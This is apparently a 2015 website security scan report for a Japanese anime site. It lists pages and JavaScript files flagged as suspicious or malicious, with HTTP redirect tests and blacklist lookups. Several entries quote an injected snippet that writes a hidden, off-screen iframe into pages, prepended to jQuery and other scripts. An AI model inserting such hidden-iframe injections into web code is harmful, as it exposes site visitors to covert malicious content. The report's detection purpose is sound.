Scanned pages/files
| Request | Server response | Status |
http://the-adult.jp/ | 200 OK Content-Length: 151172 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: animeuni3.com <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard" lang="ja" xml:lang="ja"> <head> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> < ...[4632 bytes skipped]... | ||
http://the-adult.jp/anime/alphafilter.js | 200 OK Content-Length: 3155 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.gi03wqnm0 { position:absolute; left:-1460px; top:-1427px} </style> <div class="gi03wqnm0"><iframe src="" width="552" height="352"></iframe></div>'); new function(){ try{ if (typeof document.body.style.maxHeight == "undefined") { var elements = getElementsByClassName("alphafilter"); for (var i=0; i<elements.length; i++) { var element = elements[i]; if(element.nodeName=="IMG"){ var newim var i, j, eltClass; var objAll = document.getElementsByTagName ? document.getElementsByTagName("*") : document.all; var objCN = new Array(); for (i = 0; i < objAll.length; i++) { eltClass = objAll[i].className.split(/\s+/); for (j = 0; j < eltClass.length; j++) { if (eltClass[j] == className) { objCN.push(objAll[i]); break; } } } return objCN; } } Antivirus reports:
| ||
http://the-adult.jp/anime/js/jquery.js | 200 OK Content-Length: 57426 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.gi03wqnm0 { position:absolute; left:-1460px; top:-1427px} </style> <div class="gi03wqnm0"><iframe src="" width="552" height="352"></iframe></div>'); (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}i Antivirus reports:
| ||
http://the-adult.jp/anime/js/jquery.cookie.js | 200 OK Content-Length: 4418 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.gi03wqnm0 { position:absolute; left:-1460px; top:-1427px} </style> <div class="gi03wqnm0"><iframe src="" width="552" height="352"></iframe></div>'); jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { options = options || {}; if (value === null) { value = ''; options.expires = -1; } var expires = ''; if (op for (var i = 0; i < cookies.length; i++) { var cookie = jQuery.trim(cookies[i]); if (cookie.substring(0, name.length + 1) == (name + '=')) { cookieValue = decodeURIComponent(cookie.substring(name.length + 1)); break; } } } return cookieValue; } }; Antivirus reports:
| ||
http://the-adult.jp/anime/js/category.js | 200 OK Content-Length: 1685 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.gi03wqnm0 { position:absolute; left:-1460px; top:-1427px} </style> <div class="gi03wqnm0"><iframe src="" width="552" height="352"></iframe></div>');$(function(){ $('a').each(function(){ try{ if($(this).attr('href').match(/png$|gif$|jpg$/i)){ setNoReferer(this); } }catch(e){} }); $(".side_category_list li span").each(function(ev) { var key=encodeURI($(this).text()); if($.cookie if(window.parent != window.self) a.target = '_blank'; }else{ var html = '<html><head><script type="text/javascript"><!--\n' + 'document.write(\'<meta http-equiv="refresh" content="0;url='+url+'">\');' + '// --><'+'/script></head><body></body></html>'; a.href = 'data:text/html;charset=utf-8,'+encodeURIComponent(html); } } Antivirus reports:
| ||
http://rranking2.ziyu.net/js/theadult2.js | 200 OK Content-Length: 5734 Content-Type: application/x-javascript | clean |
http://pranking3.ziyu.net/js/theadult.js | 200 OK Content-Length: 11512 Content-Type: application/x-javascript | clean |
http://rranking2.ziyu.net/rank.php?theadult2 | 200 OK Content-Length: 390 Content-Type: application/x-javascript | clean |
http://rranking2.ziyu.net/rank.php?theadult4 | 200 OK Content-Length: 390 Content-Type: application/x-javascript | clean |
http://the-adult.jp/anime/ | 200 OK Content-Length: 143558 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: animeuni3.com <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard" lang="ja" xml:lang="ja"> <head> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> < ...[4632 bytes skipped]... | ||
http://the-adult.jp/anime/2013/01/--oneoff-5.html | 200 OK Content-Length: 91120 Content-Type: text/html | clean |
http://the-adult.jp/anime/e4bd9ce59381e588a5e3819fe8a18c/4441524b4552205448414e20424c41434b/ | 200 OK Content-Length: 234079 Content-Type: text/html | clean |
http://the-adult.jp/anime/e4bd9ce59381e588a5e3819fe8a18c/544947455220262042554e4e59/ | 200 OK Content-Length: 253896 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: animeuni3.com <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard" lang="ja" xml:lang="ja"> <head> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> < ...[4629 bytes skipped]... | ||
http://the-adult.jp/anime/e4bd9ce59381e588a5e3819fe8a18c/544f4c4f5645e3828b/ | 200 OK Content-Length: 202768 Content-Type: text/html | clean |
http://the-adult.jp/anime/2013/01/post-5071.html | 200 OK Content-Length: 85139 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: the-adult.jp
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 01:51:24 GMT
Accept-Ranges: bytes
ETag: "37008b7-24deb-4e10e803b3c00"
Server: Apache
Content-Length: 151172
Content-Type: text/html
Last-Modified: Tue, 09 Jul 2013 06:45:04 GMT
Set-Cookie: PHP_SESSION_ID=-1; expires=Wed 28-Jan-2015 01:51:24 GMT; path=/
...151172 bytes of data.
GET / HTTP/1.1
Host: the-adult.jp
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 01:51:24 GMT
Accept-Ranges: bytes
ETag: "37008b7-24deb-4e10e803b3c00"
Server: Apache
Content-Length: 151172
Content-Type: text/html
Last-Modified: Tue, 09 Jul 2013 06:45:04 GMT
Set-Cookie: PHP_SESSION_ID=-1; expires=Wed 28-Jan-2015 01:51:24 GMT; path=/
...151172 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: the-adult.jp
Referer: http://www.google.com/search?q=the-adult.jp
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: the-adult.jp
Referer: http://www.google.com/search?q=the-adult.jp
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=the-adult.jp
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://the-adult.jp/
Result: the-adult.jp is not infected or malware details are not published yet.
Result: the-adult.jp is not infected or malware details are not published yet.